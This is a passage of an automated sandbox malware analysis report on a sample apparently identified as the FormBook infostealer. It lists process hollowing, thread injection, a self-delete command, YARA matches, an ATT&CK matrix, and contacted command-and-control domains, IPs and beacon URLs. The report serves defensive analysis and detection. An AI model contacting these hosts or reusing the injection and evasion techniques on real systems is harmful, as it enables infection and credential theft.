          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04808ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04768E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.shitarpa.net
          Source: C:\Windows\explorer.exeDomain query: www.northsytyle.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 170.39.76.111 80
          Source: C:\Windows\explorer.exeDomain query: www.houseofsisson.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\2435.exeSection loaded: unknown target: C:\Users\user\Desktop\2435.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\2435.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\2435.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\2435.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\2435.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\2435.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\2435.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 340000
          Source: C:\Users\user\Desktop\2435.exeProcess created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'
          Source: explorer.exe, 00000002.00000000.252916263.00000000089FF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.237275361.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 433173 Sample: 2435.bat Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 5 other signatures 2->42 10 2435.exe 20 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\System.dll, PE32 10->28 dropped 52 Detected unpacking (changes PE section rights) 10->52 54 Maps a DLL or memory area into another process 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 14 2435.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 houseofsisson.com 170.39.76.111, 49722, 80 PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY Reserved 17->30 32 www.northsytyle.com 199.59.242.153, 49719, 80 BODIS-NJUS United States 17->32 34 4 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 control.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          2435.exe43%ReversingLabsWin32.Backdoor.Mokes
          2435.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.1.2435.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.2435.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.2435.exe.24d0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.control.exe.4d7f834.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          9.2.control.exe.43b090.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.0.2435.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.2435.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.0.2435.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.shitarpa.net/dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e0%Avira URL Cloudsafe
          http://www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.knighttechinca.com/dxe/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.northsytyle.com
          		199.59.242.153
          		truetrue
            		unknown
            houseofsisson.com
            		170.39.76.111
            		truetrue
              		unknown
              shitarpa.net
              		34.102.136.180
              		truefalse
                		unknown
                www.shitarpa.net
                		unknown
                		unknowntrue
                  		unknown
                  www.houseofsisson.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.shitarpa.net/dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0efalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/Wtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRTtrue
                    • Avira URL Cloud: safe
                    		unknown
                    www.knighttechinca.com/dxe/true
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.comexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.tiro.comexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://nsis.sf.net/NSIS_ErrorError2435.exefalse
                                  		high
                                  http://www.goodfont.co.krexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIcontrol.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.carterandcone.comlexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_Error2435.exefalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fonts.comexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comexplorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            199.59.242.153
                                            		www.northsytyle.comUnited States
                                            		395082BODIS-NJUStrue
                                            34.102.136.180
                                            		shitarpa.netUnited States
                                            		15169GOOGLEUSfalse
                                            170.39.76.111
                                            		houseofsisson.comReserved
                                            		139776PETRONAS-BHD-AS-APPetroliamNasionalBerhadMYtrue

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:32.0.0 Black Diamond
                                            Analysis ID:433173
                                            Start date:11.06.2021
                                            Start time:12:11:53
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 17s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:2435.bat (renamed file extension from bat to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:29
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/4@3/4
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 23.8% (good quality ratio 22%)
                                            • Quality average: 76.3%
                                            • Quality standard deviation: 29.9%
                                            HCA Information:
                                            • Successful, ratio: 89%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SearchUI.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 13.64.90.137, 93.184.220.29, 92.122.145.220, 13.88.21.125, 52.147.198.201, 184.30.20.56, 20.50.102.62, 92.122.213.247, 92.122.213.194, 20.54.26.129
                                            • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433173/sample/2435.exe

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            199.59.242.153] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
